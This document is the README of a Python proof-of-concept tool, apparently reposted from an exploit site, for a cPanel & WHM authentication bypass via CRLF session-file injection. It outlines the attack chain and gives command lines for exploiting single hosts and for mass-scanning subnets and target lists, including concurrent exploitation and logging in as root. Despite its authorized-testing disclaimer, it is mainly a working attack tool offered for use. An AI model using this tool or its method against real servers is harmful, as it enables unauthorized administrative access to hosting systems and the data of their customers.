Share
## https://sploitus.com/exploit?id=BE50B97E-5EBC-5ADE-AD94-187E4B1DA9A7
# CVE-2026-41940 - cPanel & WHM Authentication Bypass Proof of Concept

**Version:** 1.0  
**Note:** This CVE identifier is used for research/documentation purposes only. This is **not** an official CVE assignment. This project is a proof-of-concept based on publicly disclosed vulnerabilities and security research.

**Vulnerability Pattern:** Session-file manipulation via CRLF injection / Authentication bypass
**CVSS Estimated:** 9.8 (Critical) | **CWE:** CWE-93 / CWE-306
**Affected:** cPanel & WHM versions prior to ~11.115

## Features

- Rich-powered TUI with tables, progress bars, color-coded logs
- Quiet mode (`--quiet`) for scripting/CI
- No-banner mode (`--no-banner`) for clean automation output
- CIDR expansion for subnet scanning
- Concurrent scanning (configurable workers, default 10, max 50)
- Robust retry logic and session reuse
- Output file for vulnerable hosts
- Passive detection mode

---

## Attack Chain

1. **Session creation** โ€” POST to `/login/?login_only=1` to obtain session cookie
2. **CRLF injection** โ€” GET `/` with `Authorization: Basic ` triggers `do_token_denied()` and promotes attacker-supplied session keys
3. **Privileged access** โ€” Access WHM/cPanel APIs via `/cpsess/`
4. **Confirmation** โ€” Verify exploitation with `/json-api/version`

> **Important:** This vulnerability has been patched in recent cPanel versions. Use **only** for authorized security testing.

---

## Installation

```bash
cd CVE-2026-41940
python3 -m venv venv
# Windows
venv\Scripts\Activate.ps1
# Linux/macOS
source venv/bin/activate
pip install -r requirements.txt
python main.py --help
```

**Dependencies:** `requests`, `rich`, `colorama`, `certifi`, `charset-normalizer`, `idna`, `urllib3`

---

## Usage

### Single Target

**Passive check:**
```bash
python main.py -t 192.168.1.100 --check
```

**Exploit WHM (default port 2087, SSL):**
```bash
python main.py -t 192.168.1.100 --ssl
```

**Custom port and user:**
```bash
python main.py -t example.com:2083 --ssl -u admin
```

**Increase attempts for race-condition reliability:**
```bash
python main.py -t 192.168.1.100 -p 2087 --ssl --attempts 10
```

### Mass Scanning

**Passive detection on list:**
```bash
python main.py -f targets.txt --check -c 50 -o cpanel_hosts.txt
```

**Full exploit on confirmed hosts:**
```bash
python main.py -f ips.txt --ssl -c 10 --attempts 5 -o vulnerable.txt
```

**CIDR expansion:**
```bash
# targets.txt: 192.168.1.0/24, 10.0.5.0/24:2083, example.com:2087
python main.py -f targets.txt --ssl -c 15 -o results.txt
```

**CI/CD-friendly output:**
```bash
python main.py -f targets.txt --ssl -c 20 -q --no-banner -o results.txt
```

---

## Command-Line Options

| Option | Default | Description |
|--------|---------|-------------|
| `-t HOST` | *(required)* | Single target (`host:port` supported) |
| `-f FILE` | *(required)* | File with targets (one per line, CIDR supported) |
| `-p PORT` | auto | Target port (2087 WHM/SSL, 2083 cPanel/SSL) |
| `--ssl` | True | Use HTTPS |
| `--no-ssl` | False | Use HTTP |
| `--no-verify-ssl` | False | Disable SSL verification |
| `--type` | `whm` | Service type: `whm`, `cpanel`, `webmail` |
| `-u USER` | `root` | Username after exploitation |
| `--attempts N` | 5 | Max exploit attempts per target |
| `--timeout N` | 10 | HTTP timeout in seconds |
| `--check` | False | Passive detection only |
| `-c N` | 10 | Concurrent workers (max 50) |
| `-o FILE` | None | Save vulnerable hosts |
| `-q` | False | Quiet mode (summary only) |
| `--no-banner` | False | Suppress banner display |

---

## Tips

- Start with `--check` to identify cPanel hosts before exploiting
- Use lower `-c` values (5โ€“10) for remote targets; higher (20โ€“50) for internal networks
- Increase `--attempts` (10+) for timing-sensitive race conditions
- Combine `-q` with `-o` for clean automated output
- Use `--no-verify-ssl` for self-signed certificates

---

## Disclaimer

This is a **research proof-of-concept** for educational and authorized security testing only.

- **CVE-2026-41940 is not a registered CVE** โ€” used for documentation purposes only
- **This vulnerability has been patched** โ€” based on publicly disclosed issues addressed by cPanel
- **Use only on systems you own or have explicit written authorization to test**
- **Unauthorized access is illegal** and violates applicable laws

The author assumes no liability for misuse of this tool.

---

## Legal & Ethical Use

Intended for:
- Security professionals conducting **authorized** penetration tests
- System administrators validating cPanel/WHM installations are up-to-date
- Educational purposes in controlled lab environments

**Do NOT** scan or exploit production systems without explicit permission.
**Do NOT** use on cloud-hosted instances unless they are your own.

---

## References

| Resource | Link |
|----------|------|
| cPanel Security Advisories | https://cpanel.net/security/ |
| cPanel Documentation | https://docs.cpanel.net/ |

---

## License

MIT License